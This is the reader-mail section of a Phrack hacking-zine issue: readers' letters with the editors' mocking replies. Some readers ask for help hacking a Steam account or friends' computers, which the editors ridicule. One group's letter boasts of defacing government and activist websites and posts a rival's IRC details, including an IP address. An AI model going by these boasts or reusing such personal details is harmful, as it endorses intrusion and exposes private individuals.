|
somehow i will get the infection back.
|
|
|
|
[ You killed the poor network? :-/ ]
|
|
|
|
Could someone make me a batch file or better yet a ISO to boot and fix my
|
|
Bios and memory so it has Persistent BIOS Infection that is null. Giving
|
|
back my rendering power. Making it so i can't get this infection again.
|
|
|
|
[ Just a thought: maybe if you didn't run arbitrary batch files that
|
|
"someone" sent you, you wouldn't have this problem in the first
|
|
place. But most probably that's not it. It must be a 'Persistent BIOS
|
|
Infection' problem. ]
|
|
|
|
Maybe send me a zip file to my email address. Pleezz
|
|
I would be more than happy to donate for the cause.
|
|
|
|
[ And yet another person willing to give us money. We should really run
|
|
a company :D ]
|
|
|
|
Thank You
|
|
Kevin ****
|
|
*******@att.net
|
|
|
|
---
|
|
|
|
From: shashank **** <**********@gmail.com>
|
|
Subject: hey
|
|
|
|
hey,
|
|
i was searching some hacking forums site, & found one of the "phrack
|
|
Magazine".
|
|
|
|
[ Then you failed. It's not a forum kid :) ]
|
|
|
|
It was pretty interesting. Can you help me out on how to hack Steam
|
|
Account.
|
|
|
|
[ Do you have a paypal account? ]
|
|
|
|
---
|
|
|
|
From: David ***** <dfg******@yahoo.com>
|
|
Subject: RootKit Iphone 4g
|
|
|
|
Hey i was recently on your website and well i was looking for something to
|
|
mess with my friends, see were all in the same class and we all connect to
|
|
the same network/router thing, and you hve to login to gain acess to the
|
|
network, so i was wondering if there was a way to control my friends
|
|
computer with mine while were hook to the network.
|
|
|
|
[ XD ]
|
|
|
|
DoFoG
|
|
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x06 - About the scene philes ]=-----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Prashant KV <bug@null.co.in>
|
|
Subject: Thank You
|
|
|
|
[ You're very welcome. ]
|
|
|
|
Hi,
|
|
I would like say thanks each and every individual in Phrack team for
|
|
publishing our article. This will go a long way in creating awareness about
|
|
null community.
|
|
Thanks all....
|
|
|
|
[ And thank you for the scene phile. Always a pleasure to exchange with
|
|
interesting/nice people. ]
|
|
|
|
---
|
|
|
|
From: Hackers News <thehackernews@gmail.com>
|
|
Subject: Article Editing
|
|
|
|
[ HEY!!! You're the guy who tried to befriend us on linkedin!!! ]
|
|
|
|
Hello Sir,
|
|
We are admin of "*The Hacker News*" : *http://www.thehackernews.com/* . We
|
|
read an article on your Website :
|
|
http://www.phrack.org/issues.html?issue=67&id=16#article
|
|
I wanna ask you that on what basis you write about "*Indian Cyber Army :
|
|
http://www.cyberarmy.in/*" .
|
|
|
|
* Fake ICA. There is yet another ICA (cyberarmy.in) which is announced as
|
|
fake ICA by the actual ICA group. One glance at the website content
|
|
tells you that there is some truth to what the actual ICA(indishell)
|
|
guys and other say and reminds you of the infamous plagiarism cases
|
|
(Ah! Any Indian h4x0r's favourite topic when they feel like bitching
|
|
about something :-P)*
|
|
|
|
*Whatever you write is not fair and I think it represents the mistake
|
|
done by you, that you write about a group without knowing about them,
|
|
Read This : *
|
|
|
|
*http://www.cyberarmy.in/p/about-us.html*
|
|
|
|
*and I think you should 1st know about it. Hope you will edit the
|
|
article.... as soon as possible.*
|
|
|
|
[ You may or may not be right and clearly we don't have enough
|
|
information to judge. For the sake of the truth and freedom of
|
|
speech, we are posting your comment. ]
|
|
|
|
*Thanks,*
|
|
|
|
[ No prob dude. ]
|
|
|
|
*Owner*
|
|
|
|
*The Hacker News...*
|
|
|
|
---
|
|
|
|
[ The following is a mail that we received several times between the
|
|
21st and the 22nd of June... As we said in the introduction, a few
|
|
greek people were angry because of the scene phile. Because we're
|
|
(not that much) bastards, we felt that these people deserved the
|
|
right to be published as well. So here it is...
|
|
|
|
Oh and they even pasted it in the comments! ]
|
|
|
|
|
|
From: xak xak0r <xak3ri@hotmail.com>
|
|
Subject: Greek Hacking Scene is alive!
|
|
|
|
From: Unkn0wn <unknown.ws1@gmail.com>
|
|
Subject: GHS - read this message
|
|
|
|
From: Spyros Kous <spirou1988@hotmail.com>
|
|
Subject: GHS for you.
|
|
|
|
From: nikos piperos <piperos_22@hotmail.com>
|
|
Subject: By <GHS>
|
|
|
|
From: ****** ******* <deathlyrhymer@hotmail.com>
|
|
Subject: greek.hacking.scene
|
|
|
|
[ Sorry, due to ASCII constraints we had to censor the name of this
|
|
guy :D ]
|
|
|
|
From: Stephen O'Neill <apple-whore@hotmail.com>
|
|
Subject: 0xghs
|
|
|
|
[ You've got your hex wrong dude ]
|
|
|
|
From: Brian Higgins <bhiggins69@hotmail.com>
|
|
Subject: **************************
|
|
|
|
[ Hey next time write the subject in english please :) ]
|
|
|
|
From: eibhlin mcnamara <mcnamara105@hotmail.com>
|
|
Subject: G*H*S - always here
|
|
|
|
[ A sibling of Sean maybe? ]
|
|
|
|
From: nikpa pfcc <aeknik@hotmail.com>
|
|
Subject: Greek Hacking Scene - Read your errors
|
|
|
|
From: nikpa papaa <nikpa21@gmail.com>
|
|
Subject: Greek Hacking Scene - Read your errors
|
|
|
|
[ Yeah, we ordered the lamb gyros with extra pita and tzatziki. None of
|
|
you guys delivered. Worst Greek Hacking Scene evar! Would not order
|
|
from you again. ]
|
|
|
|
From: NIKO*** *ANTAZO*OY*** <aeknik@yahoo.gr>
|
|
Subject: Read this, about errors - GHS
|
|
|
|
[ This one had his name only partially encrypted. ]
|
|
|
|
From: kondor fromGHS <kondorghs@gmail.com>
|
|
Subject: Greek Hacking Scene
|
|
|
|
[ Hey Kevin Mitnick? :) ]
|
|
|
|
Nice to see Greek Hacking Scene on Phrack, but very sad to say that there
|
|
is no connection of all those with reality. This post represents something
|
|
that even doesn't exist except theory.
|
|
|
|
In the other hand, is not mentioned technological steps and targets that
|
|
Greek Hacking Scene archived, not in theory, but in actions.
|
|
|
|
However in the References i see nothing trust source, while you avoid posts
|
|
on newspapers, magazines and tv about Greek Hacking Scene.
|
|
|
|
Maybe Phrack can't handle the name of GHS and writing about fantasies.
|
|
Greek Hacking Scene is not a group, team or crew etc. but is ideology of
|
|
decades, is not about fame, but is about targets, technology and advance.
|
|
You must know that GHS does NOT follow things such "Hackers Manifesto" and
|
|
is well known that this person take back what he said about this manifesto
|
|
in shake to save him from things. He even does NOT defence his ideology,
|
|
how then we can accept such thing?! Basically we are what we create and we
|
|
gonna call hacking what we think hacking is, you can call us as you want,
|
|
but this can't change our actions, we not negotiate our ideology and we are
|
|
not followers of any paid, fantasy or theory ideologies. We rage against
|
|
machine, the system. Is good that Phrack exist cuz keep the magic to those
|
|
who want to be related with hacking. While you keep the feeling of magic to
|
|
your readers, we know that is all about coding, methodology and how far
|
|
each mind can think to do things.
|
|
|
|
For those who forgets, security is a part of hacking, security is not
|
|
hacking. Hacking is every electronic violation, violation doesn't mean that
|
|
is illegal always. As a term, hacking is every electronic violation.
|
|
|
|
About Greek Hacking Scene you forget to mention a lot of groups and people
|
|
(and is not about names) who they did things and they left lot of stuffs
|
|
behind. Those people and groups they never care about their nicknames or
|
|
the name of the group cuz is useless, can be any nickname or group name, at
|
|
the end what it left, is what had created. Who make it, it doesn't matter
|
|
really cuz those who make it as share they do it cuz they want.
|
|
|
|
If is to write about things that are not related with the true and reality,
|
|
better don't write about Greek Hacking Scene. You can write for posers and
|
|
others who they want fame, but not for GHS. You can write fantasy, stories,
|
|
anything you like, but as long as is not connected with reality and true,
|
|
then don't write about Greek Hacking Scene. Maybe you can write for any
|
|
other Greek Hacking Scene you want or you believe, but mention also that is
|
|
not connected all those stories with Greek Hacking Scene (GREEK SENTENCE).
|
|
|
|
[ GREEK SENTENCE is something written in greek that we could not
|
|
translate nor write in the phile because of the greek alphabet. ]
|
|
|
|
Cheers,
|
|
|
|
|
|
Your article forgets to write about DefCon meetings that take place in
|
|
Greece, and of course about the unique Codehack meetings that shows live
|
|
Hacking. Or even is not mentioned things such SpyAdmin and Firehole, or
|
|
what about Hash, Phrapes, Cdx, r00thell, hackgr and more?! What about the
|
|
references on magazines, newspapers and tv? What about the members of Greek
|
|
Hacking Scene that works on penetration testing companies or making atm
|
|
softwares and banking or those who works in known computers and servers
|
|
companies and they create technology?!
|
|
|
|
About the grhack (that nobody knows) is those guys from auth that got
|
|
hacked their servers and their pcs and tooked personal files of them?
|
|
|
|
Check this link:
|
|
http://zone-h.org/mirror/id/6638423
|
|
|
|
I read slasher?! This person who has the grhack site that you took as
|
|
reference?! With the name ********** **********?!
|
|
|
|
[ Publishing an individual's real name is against our rules. You
|
|
got away with it in the comment section once. ]
|
|
|
|
Oh come on, i have also beautiful pictures who they poser as engineers!
|
|
Oh now i got it! They write about their selfs! How smart... what a fame...
|
|
what a pose!
|
|
|
|
Before you write anything about Greek Hacking Scene take a look to the
|
|
targets. We have down anarchist such indymedia sites, and also nationalist
|
|
sites, as well he hacked into Goverment sites, political parties, national
|
|
services, and of course all the hacking-security related greek sites who
|
|
they offer only theory and lies that has no connection with reallity and
|
|
hacking.
|
|
|
|
And i guess so you promote the Anarchy?! So don't forget Phrack to mention
|
|
that everything you wrote is about Anarchy, not about hacking.
|
|
|
|
Greek Hacking Scene has members from all political sides and we have things
|
|
in common we work for.
|
|
|
|
This is grhack.net, this is the guy that send hopeless messages to google
|
|
blogspot to DOWN the info that SpyAdmin post, passwords, files, everything!
|
|
|
|
|
|
->> Slasher is nameless@155.207.206.86 (LoCo En El CoCo)
|
|
->> Slasher is on: #grhack #anarchy
|
|
|
|
|
|
--ChanServ-- Information for channel #grhack:
|
|
--ChanServ-- Founder: Slasher
|
|
--ChanServ-- Description: GR Hack - http://www.grhack.net
|
|
--ChanServ-- Registered: Aug 05 21:36:46 2010 EEST
|
|
|
|
|
|
--NickServ-- Information for nickname Slasher:
|
|
--NickServ-- Realname: LoCo En El CoCo
|
|
--NickServ-- Is online since: Dec 21 17:26:15 2010 EET
|
|
--NickServ-- Time registered: Oct 25 23:22:13 1999 EEST
|
|
--NickServ-- Last quit message: Ping timeout
|
|
--NickServ-- E-mail address: slasher@grhack.net
|
|
--NickServ-- Options: Kill protection, Security, Private
|
|
--NickServ-- *** End of Info ***
|
|
|
|
|
|
Maybe spyadmin is closed by google blogspot after the emails of grhack.net
|
|
Slasher cuz the stuff is related about him
|
|
|
|
but look the comments of this website and the date, to know the existance
|
|
of spyadmin
|
|
|
|
http://press-gr.blogspot.com/2007/09/blog-post_3165.html
|
|
|
|
(SOMETHING IN GREEK...)
|
|
spyadmin.blogspot.com
|
|
(SOMETHING IN GREEK AGAIN)
|
|
(7 September 2007)
|
|
|
|
Now look also the date of the defacement in the zone-h digital archive:
|
|
|
|
http://zone-h.org/mirror/id/6638423
|
|
|
|
and look the date too,
|
|
# Mirror saved on: 2007-09-08 13:58:32
|
|
# * Notified by: GHS
|
|
(8 September 2007)
|
|
|
|
---
|
|
|
|
Greek Hacking Scene has no colour and does not support any political side.
|
|
|
|
Take example to indymedia athens, i will give you 2 links, in the first
|
|
they say that GHS is nationalist and hack their website, and in the other
|
|
link on the same website, they give congratulations in GHS cuz they did
|
|
actions and defacements according to left ideology.
|
|
|
|
In fact GHS has it's own ideology and act as GHS believe.
|
|
|
|
1 link:
|
|
http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D706934
|
|
|
|
2 link:
|
|
http://athens.indymedia.org/front.php3?lang=3Del&article_id=3D620090
|
|
|
|
The comments are yours, let see the Freedom of Speech now, the TRUE the
|
|
REALITY, the FACTS!
|
|
|
|
Somes they didn't learn from their mistakes. GHS has no hate for anyone and
|
|
act not for revenge causes or anything else. According to all our actions,
|
|
we do warning and when we act we just put the informations as is, we don't
|
|
put sauses, you put sauses maybe.
|
|
|
|
The reason i wrote this is the true and reality.
|
|
|
|
Before some years there are many "hackers" in Greek chat rooms etc, they
|
|
speak about theory and when kids comming to learn, they laught only at them
|
|
and they make those kids to become like them, liers without education and
|
|
knowledge, kids that become like them, to know just some words, theory
|
|
without they know what for they speak about and to spend lost time chatting
|
|
and destroy other kids comming. Members of GHS hacked and take access in
|
|
most and almost all Greek websites, chat rooms, irc servers etc, that was
|
|
security-hacking related. We are always here, maybe not the same persons,
|
|
but members of GHS are change all the time and keep the safe ideology. In
|
|
the other hand, we let teenagers who are interested to hacking, we turn
|
|
them to coding, to let them think their future, education, freedom ideas
|
|
and to let them want to do things and create. Defacements and Hacking are
|
|
our fireworks to let them get the magic and on the way to show to them that
|
|
there are so many tools and things on net to hack a website and hack, but
|
|
if you want to go more further, you have to learn coding, to explore, to
|
|
let your mind free and think far away, for what can be happen and what not.
|
|
To go a step further with their minds, not by giving them stuff in the
|
|
plate, but let them do it and explore it by their selfs! I know keeps that
|
|
believe and do things, on the way they do things and go advance, those kids
|
|
are the next cycle of GHS who will pass the same ideas, believes and
|
|
technology to the next generations.
|
|
|
|
Greek Hacking Scene 2010.
|
|
|
|
[ All we can say is 'What?' ]
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x07 - Interesting mails ]=----------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: "L. *****" <l.*******@yahoo.com>
|
|
Subject: idea for next profile
|
|
|
|
my you should do a hacker profile on j3ster since he is one of the most
|
|
prominent hackers that I've heard about out there,
|
|
|
|
[ Dunno the guy. We already chose one anyway. You may have heard of
|
|
him. ]
|
|
|
|
or do one on that rat who turned in bradley manning
|
|
|
|
[ The saying is not: Snitches get Prophiles. ]
|
|
|
|
|
|
---
|
|
|
|
From: infosec <infosec@cyberdo.net>
|
|
Subject: Release date?
|
|
|
|
Hi Guys,
|
|
|
|
Firstly, let me thank you for the on-going release of this great
|
|
e-zine.
|
|
|
|
[ You're welcome. ]
|
|
|
|
Most of these e-zines surfaced and then disappears over the horizon yet
|
|
albeit the long term delays in-between releases :)you've kept this
|
|
going.
|
|
Thank you.
|
|
|
|
[ ^_^ ]
|
|
|
|
I am very much interested in the up and coming release and would like
|
|
to know the date or drop us a note on the website.
|
|
|
|
[ Done. ]
|
|
|
|
Also, I'd like to know how to join phrack team of staff.
|
|
|
|
[ There is a GREAT mystery about how the phrack staff acquires
|
|
members. Sorry dude, there is currently no open spot :) ]
|
|
|
|
Greetz,
|
|
infosec
|
|
|
|
---
|
|
|
|
From: Zagan Hacktop <zagan@live.co.uk>
|
|
Subject:
|
|
|
|
YO!
|
|
do you still have an IRC?
|
|
|
|
[ We do. But it's a private one. We may open a public or half-public
|
|
one someday... Don't hold your breath however. ]
|
|
|
|
---
|
|
|
|
From: daniel ***** <******@gmail.com>
|
|
Subject: new age LoD
|
|
|
|
hi am a head of a team that disided that LoD
|
|
is a legacy and cant just disappear... it must be reborn or the web will
|
|
loose alot and with the way things are going today
|
|
the web realy cant efored it or it will eventualy die for the simple
|
|
user...
|
|
|
|
we are looking for the original LoD members (or at list any way to
|
|
comunicate with them)
|
|
(specialy for night lightning)
|
|
|
|
if this information can be passed to them it would be realy nice.. all we
|
|
want is a some advice (not technical) ...
|
|
|
|
|
|
my email is ******@gmail.com (nick: galeran).
|
|
if you can help please do
|
|
thanks
|
|
|
|
[ Not sure about the true intentions but anyway this might help.]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x08 - Greek people are angry ]=----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
[ For clarification purposes, we received this mail after we released
|
|
the index and before we released the philes. ]
|
|
|
|
---
|
|
|
|
From: Iordanis Patimenos <iopatmenos@yahoo.gr>
|
|
Subject: Phrack 67
|
|
|
|
[ So what, another greek? At least this one is not complaining about
|
|
the scene phile ;) ]
|
|
|
|
YEAR: 2010, OSs:64-bit, protection mechanisms: ASLR, DEP, NX, .... , Attack
|
|
mechanisms: JAVA VM exploitation, Flash VM exploitation, ... the only
|
|
thing you had to do was to let the knowledge flow.
|
|
|
|
[ The only thing? Such a nice little kid daydreaming :) ]
|
|
|
|
What to do the info in 'Scraps of notes on remote stack overflow
|
|
exploitation', 'Exploiting Memory Corruptions in Fortran Programs Under
|
|
Unix/VMS' (FORTRAN wtf),
|
|
|
|
[ FORTRAN... indeed :') We'll do something about COBOL as well (it is
|
|
'safe' so no memory corruptions, something else). We'll keep you
|
|
posted. ]
|
|
|
|
'A Eulogy For Format Strings' if we cannot apply on current protection
|
|
mechanisms.
|
|
|
|
[ Well that's the point. You can. Oh wait, you would have known if
|
|
you had kept your sorry mouth shut and actually read the papers
|
|
first :> ]
|
|
|
|
New edit or better you didn't publish this new fucking delayed, bad content
|
|
phrack p67, BIG FAIL, that's not the PHRACK we know. What a retarded
|
|
content you provided after all this waiting time!!! Not a chance to compare
|
|
to previous phrack issues. This issue is just a joke, nothing more, happy
|
|
1st APril assholes, you made PHRACK seems trash magazine.
|
|
|
|
[ The cool thing with morons like you is that it would be pointless to
|
|
explain things, which makes our job somewhat easier. Congratulations
|
|
for your participation in p68, you've made it ;-) ]
|
|
|
|
-Fan of Phrack-
|
|
|
|
[ Yes. It shows. ]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON
|
|
|
|
[ Another desperate housewife? The name is familiar...]
|
|
|
|
YOU ARE SO FUCKING FUNNY
|
|
|
|
[ WE DO HOPE WE ARE ]
|
|
|
|
I'M SURE THE NEW ISSUE WILL BE SUCH A FAIL AS THE PREVIOUS ONE (THE ONE
|
|
THAT YOU TRIED TO ADVERTISE AS A BIG HIT)
|
|
|
|
[ OHHHHH A BIG HIT REALLY? DAMMIT MY CAPSLOCK IS REALLY FUCKED. ]
|
|
|
|
JUNE 2011: PHRACK ISSUE #68 ... YES _SUCH_A_FAIL
|
|
|
|
[ NOT IN JUNE, WE ARE *ALWAYS* LATE ]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: JUNE 2011: PHRACK ISSUE #68 ... YES _THAT_ SOON
|
|
|
|
Group: The Phrack Staff
|
|
|
|
[ Hum, it seems that you have fixed the capslock problem.
|
|
You're elite. ]
|
|
|
|
Most *FAIL* group ever in phrack, you hurt the magazine go away.
|
|
|
|
[ Hey now I remember you!!! :) It looks like you are obsessed with us.
|
|
You must be our number one fan in greece. Even now that we have so
|
|
many greek fans. ]
|
|
|
|
>>>>>>>>>> From earlier >>>>>>>>>>
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: Phrack issue 58
|
|
|
|
How can i get the binary-encryption.tar.gz
|
|
from the article Runtime binary encryption?
|
|
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|
|
|
[ So:
|
|
1. Did you manage to download the file? :)))))
|
|
2. *EPIC* *FAIL*?
|
|
]
|
|
|
|
---
|
|
|
|
From: Nikol Eleutheriou <nikoletaki_87@yahoo.gr>
|
|
Subject: New phrack issue
|
|
|
|
[ What? You again? ]
|
|
|
|
Marry Christamas :) and happy New York
|
|
|
|
[ LOL. You're doing it wrong! ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x09 - PHRACK got spam'd? ]=---------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: ***** ******** <darkjoker93@gmail.com>
|
|
Subject: ANTISPAM
|
|
|
|
Hi guys :)
|
|
Here's an article I've just written, I know it's a bit late for the
|
|
submissions, but perhaps you may publish it in the next issue. Anyway, the
|
|
topic is how to bypass a captcha, and, in particular, how to bypass the one
|
|
on your site :). No offense, but it's really weak.
|
|
|
|
[ None taken. We simply took the first capcha mechanism available on
|
|
the web which was not going to get us owned. However we got spam,
|
|
that's for sure, sorry about that fellow readers. ]
|
|
|
|
If you don't find it interesting please at least change your captcha
|
|
because I'm really sick (and I'm sure I'm not the only one) of reading
|
|
spam messages (I swear it was not me :).
|
|
|
|
[ We'll do both so that you can get better :> ]
|
|
|
|
I'm italian, therefore my english is not very good,
|
|
|
|
[ Nobody's perfect! ]
|
|
|
|
if the paper is so bad written it can't be even read, send it back to me,
|
|
I'll try to rewrite it in a better way.
|
|
|
|
Bye,
|
|
darkjoker
|
|
|
|
[ And that's the story of how his contribution got published in
|
|
Linenoise. Thx darkjoker. ]
|
|
|
|
---
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0A - The urge to get p68!!! ]=-----------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: Barak ***** <barak*****@gmail.com>
|
|
Subject: Question
|
|
|
|
[ This one is not the current president of the US, we checked. ]
|
|
|
|
Hi,
|
|
|
|
I have been following the magazine for a while now and I have been waiting
|
|
for the new issue. Last I checked it was suppose to come out in June...
|
|
Can you let me know when I should except the new issue?
|
|
|
|
[ Are you reading this? Then issue #68 is out. You're welcome. ]
|
|
|
|
Barak
|
|
|
|
[ That's the problem with every issue, you should NEVER trust us when
|
|
we announce dates ;) ]
|
|
|
|
---
|
|
|
|
From: Rodri ***** <rodrigo******@hotmail.com>
|
|
Subject:
|
|
|
|
[ Hey ANTISPAM is missing! ]
|
|
|
|
Hello,
|
|
|
|
For godsake we are already in June!
|
|
|
|
[ Sorry about that bro :) ]
|
|
|
|
Now seriously and kindly is it coming out soon?
|
|
|
|
Best regards.
|
|
Roders.
|
|
|
|
---
|
|
|
|
From: LEGEND XEON <legend.xeon@gmail.com>
|
|
Subject: Phrack 68th Issue Release
|
|
|
|
Hello mate,
|
|
I am very interested in upcoming 68th issue of phrack.
|
|
The whole world is counting on you!!
|
|
|
|
[ The whole world? Not even the whole scene mate ;) ]
|
|
|
|
I just want to know when will be the release and can you give me a glimpse
|
|
of contents inside it.
|
|
I will be eagerly waiting for your reply.
|
|
|
|
[ Hehe, hope you didn't wait too much. ]
|
|
|
|
~Legend_Xeon
|
|
|
|
---
|
|
|
|
From: fernando ****** <core******@gmail.com>
|
|
Subject:
|
|
|
|
my life gets duller every day you don't release the new issue
|
|
|
|
[ Let's hope this one didn't commit suicide before we released :| ]
|
|
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0B - Students project? ]=----------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: "(s) Charmaine Anderson" <Charmaine.Anderson@students.newport.ac.uk>
|
|
Subject: Creating Middle-Ware for Distributed Cryptanalytic Applications
|
|
|
|
To whom it may concern,
|
|
|
|
I am contacting you to tell you about my final year project for my degree.
|
|
I would be very grateful if you were able to follow my progress and perhaps
|
|
also contribute any tips and ideas. I will also be writing an application
|
|
which, if successful, I will be posting online for download.
|
|
|
|
Using the RC5 block cipher and the competitions run by RSA Laboratories
|
|
(1997-2007) as benchmarks, experiments will be conducted using different
|
|
methods of distributed computing. The implications of the results will lead
|
|
to a better understanding of how cryptanalysis can be conducted through
|
|
areas such as grids and internet-based cloud computing or virtualisation.
|
|
|
|
The reason for this project is that distribution methods have been used for
|
|
many years in order to conduct cryptanalysis; however, I have noticed that
|
|
this has been for purposes such as testing the security of new ciphers and
|
|
creating a better understanding of how they work. But, to my knowledge,
|
|
there has been little-to-no research into the implications of real-world
|
|
attacks through distribution.
|
|
|
|
To summarise, I plan to test the limits of computational security in order
|
|
to expose the possibility of real-world cryptanalytic attacks using the
|
|
'unlimited' computing power that is slowly becoming available to the
|
|
public.
|
|
|
|
It is possible to follow the progress of this project through
|
|
http://www.distributedcryptanalysis.co.uk/. A number of blogs are also
|
|
being used in order to attract more interest, links to these will be posted
|
|
on the website very shortly.
|
|
|
|
Yours Sincerely,
|
|
|
|
Charmaine Anderson
|
|
|
|
BSc (Hons) Forensic Computing
|
|
University of Wales, Newport
|
|
|
|
[ Well he seemed to be a good kid so we published his mail ;) ]
|
|
|
|
---
|
|
|
|
From: Johannes Mitterer <johannesmitterer@googlemail.com>
|
|
Subject: Hacker's Manifesto
|
|
|
|
Dear Phrack-Team,
|
|
|
|
currently I'm working on my bachelor's thesis part of which is an analysis
|
|
of The Mentor's Hacker's Manifesto. In this context, there's little
|
|
confusion about the question how the manifesto was first published. As I
|
|
understand it, the manifesto was first published ONLINE in phrack magazin,
|
|
whereas my professor stated that the first issues of phrack including Issue
|
|
#7 in which the manifesto was published were only available offline as a
|
|
printed version and later put on the internet. Perhaps You could help me
|
|
clearing up this confusion.
|
|
|
|
[ Wasn't the early edition of phrack all scene .txt philes on BBSes?
|
|
Like, #7 was pre internet for sure. I doubt that any of the editors
|
|
back then would have bothered printing hardcopies, since it is
|
|
extremely inefficient and expensive and the target audience is ppl w/
|
|
computers. ]
|
|
|
|
Thanks in advance!
|
|
|
|
Yours,
|
|
Johannes Mitterer
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0C - Phrack & the chicks ]=--------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: kimberly - <*******@hotmail.com>
|
|
Subject: Graduate essay
|
|
|
|
Hello Staff,
|
|
We are senior high school students from 'Stella Maris College' in the
|
|
Netherlands and we are writing an essay about the reputation of hacking. If
|
|
it is okay with you, we would like to ask a few questions:
|
|
- How could you start the site, because hacking is illegal and it might
|
|
endanger your users who discuss hacking?
|
|
|
|
[ Wait it's illegal? We're shutting down the site immediately :| ]
|
|
|
|
- Have you ever gotten negative/positive reactions to your site? And what
|
|
where those reactions?
|
|
|
|
[ Well everything is in this file :D ]
|
|
|
|
- Is there any information that is not known to people who are not hackers
|
|
and that is not easy to find in books or the internet? If so, where could
|
|
we find this information?
|
|
|
|
[ IRCS? Nah it's just for the chitchat :) ]
|
|
|
|
- Is there anything in your opinion that is so important, that we can't
|
|
possibly leave out? We would be very happy if you could answer these
|
|
questions or forward this email to someone who might know more about
|
|
this.
|
|
|
|
[ I'm not too sure you guys will be able to graduate with that many
|
|
questions so good luck :D ]
|
|
|
|
Thank you very much in advance!
|
|
- Dingding and Kimberly
|
|
|
|
---
|
|
|
|
From: Eva ******* <*****@gmail.com>
|
|
Subject: Article
|
|
|
|
Dear Phrack Staff,
|
|
|
|
I'm preparing an article concerning some hacks to Linden Lab's SecondLife
|
|
viewer and I would like to publish the results in your magazine. Could you
|
|
please, if possible, provide some details where and to whom I should send
|
|
it to and if there are any requirements I must fulfil.
|
|
|
|
Thank you,
|
|
Eva
|
|
|
|
[ We published the paper in the linenoise.
|
|
Thanks for the submission Eva! Nice pics btw ;> ]
|
|
|
|
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
|
|
|--=[ 0x0D - ROFL ]=-----------------------------------------------------=|
|
|
[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
|
|
|
|
|
|
From: ***** ***** <****.*****.****@gmail.com>
|
|
Subject: script
|
|
|
|
Man, I was bored taking a break from working on a vpn project at a library
|
|
and decided to make a script in bash to download and decompress the phrack
|
|
mags. Its newb meat but I guess Im just going to send it in for you guys to
|
|
laugh at, rofl.
|
|
|
|
[ ROFL indeed. ]
|
|
|
|
---
|
|
Jackie ***** ****** - *"Focus on Solutions not Problems"*
|
|
|
|
[ But you create solutions for non existent problems :D ]
|
|
|
|
Email0: *****.*****.*****@gmail.com
|
|
Email1: skraps_rwt@yahoo.com
|
|
|
|
[ We added the script below. If someone could help Nikol Eleutheriou to
|
|
decrypt it so that she doesn't complain please... ]
|
|
|
|
begin-base64 644 getPhrack.sh
|
|
IyEvYmluL2Jhc2gKCiNDVVJJU1NVRT0iNjciClVSTD0iaHR0cDovL3d3dy5w
|
|
aHJhY2sub3JnL2FyY2hpdmVzL3Rnei8iCkVaSU5FRElSPSIvaG9tZS9za3Jh
|
|
cHMvZXppbmVzL3BocmFjay8iCkNVUklTU1VFPWBHRVQgaHR0cDovL3d3dy5w
|
|
aHJhY2sub3JnLyB8IGdyZXAgSVNTVUUgfCBjdXQgLWIgNTAtNTFgCiNwaHJh
|
|
Y2s2Ny50YXIuZ3oKCmNkICRFWklORURJUgoKZXhpdHN0YXQoKXsKCWlmIFsg
|
|
JD8gPT0gIjAiIF07IHRoZW4KCQllY2hvICJFeHRyYWN0aW9uIHN1c2NjZXMi
|
|
